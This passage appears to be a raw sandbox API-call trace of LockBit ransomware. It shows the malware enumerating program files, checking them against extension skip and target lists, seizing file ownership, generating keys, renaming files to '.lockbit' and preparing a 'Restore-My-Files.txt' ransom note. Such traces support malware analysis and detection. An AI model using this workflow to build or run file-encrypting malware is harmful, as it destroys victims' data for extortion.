FileInformationClass=0xa) returned 0x0 [0080.853] free (_Block=0x77d800) [0080.853] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.853] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.853] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.853] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f199665, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f199665, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0080.853] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.853] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.853] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0080.853] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.853] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.853] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.853] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.853] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.853] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.853] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.853] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.853] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.854] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.854] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.854] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.854] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.854] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.854] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.855] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.855] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.855] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.855] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.855] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.855] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.855] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.855] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.855] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.855] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.855] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.856] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.856] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.856] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png") returned=".png" [0080.856] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.856] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.856] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.856] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.857] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.857] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.857] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.857] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.857] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.857] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.857] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.857] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.857] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.857] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png.lockbit") returned 94 [0080.857] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.861] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.861] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.862] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.862] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.862] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.862] RtlFreeAnsiString (AnsiString="\\") [0080.862] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.862] malloc (_Size=0x200) returned 0x77d800 [0080.862] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.862] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.862] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.862] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.863] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.863] CloseHandle (hObject=0x3a0) returned 1 [0080.863] free (_Block=0x77d800) [0080.863] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.863] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.864] malloc (_Size=0x40068) returned 0x3d70048 [0080.864] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3081) returned 1 [0080.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.864] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.865] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.867] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.867] malloc (_Size=0xd2) returned 0x77d800 [0080.868] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd2, FileInformationClass=0xa) returned 0x0 [0080.868] free (_Block=0x77d800) [0080.868] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.868] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.868] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.868] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f231bd9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f231bd9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x0, dwReserved1=0x0, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 1 [0080.868] lstrcmpiW (lpString1=".", lpString2="pushplaysubpicture.png") returned -1 [0080.868] lstrcmpiW (lpString1="..", lpString2="pushplaysubpicture.png") returned -1 [0080.868] PathFindExtensionW (pszPath="pushplaysubpicture.png") returned=".png" [0080.869] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.869] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.869] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.869] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.869] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.870] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.870] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="pushplaysubpicture.png") returned 1 [0080.871] lstrcmpiW (lpString1="ntldr", lpString2="pushplaysubpicture.png") returned -1 [0080.871] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="pushplaysubpicture.png") returned -1 [0080.871] lstrcmpiW (lpString1="bootsect.bak", lpString2="pushplaysubpicture.png") returned -1 [0080.871] lstrcmpiW (lpString1="autorun.inf", lpString2="pushplaysubpicture.png") returned -1 [0080.871] lstrcmpiW (lpString1="thumbs.db", lpString2="pushplaysubpicture.png") returned 1 [0080.871] lstrcmpiW (lpString1="iconcache.db", lpString2="pushplaysubpicture.png") returned -1 [0080.871] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.871] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned=".png" [0080.871] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.871] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.871] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.871] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.872] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.872] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.872] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.872] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.872] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.872] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.872] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.872] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.872] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.872] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.872] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.872] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.872] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.872] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.872] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png.lockbit") returned 80 [0080.872] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.873] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.873] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.873] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.873] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.873] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.874] RtlFreeAnsiString (AnsiString="\\") [0080.874] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0080.874] malloc (_Size=0x200) returned 0x77d800 [0080.874] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.874] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.874] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.874] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.874] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.875] CloseHandle (hObject=0x3c4) returned 1 [0080.875] free (_Block=0x77d800) [0080.875] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.875] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.875] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.875] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2962) returned 1 [0080.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.876] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.881] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.881] malloc (_Size=0xb6) returned 0x77d800 [0080.881] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0080.881] free (_Block=0x77d800) [0080.882] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.882] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.882] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.882] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f231bd9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f231bd9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x0, dwReserved1=0x0, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 0 [0080.882] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0080.882] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, 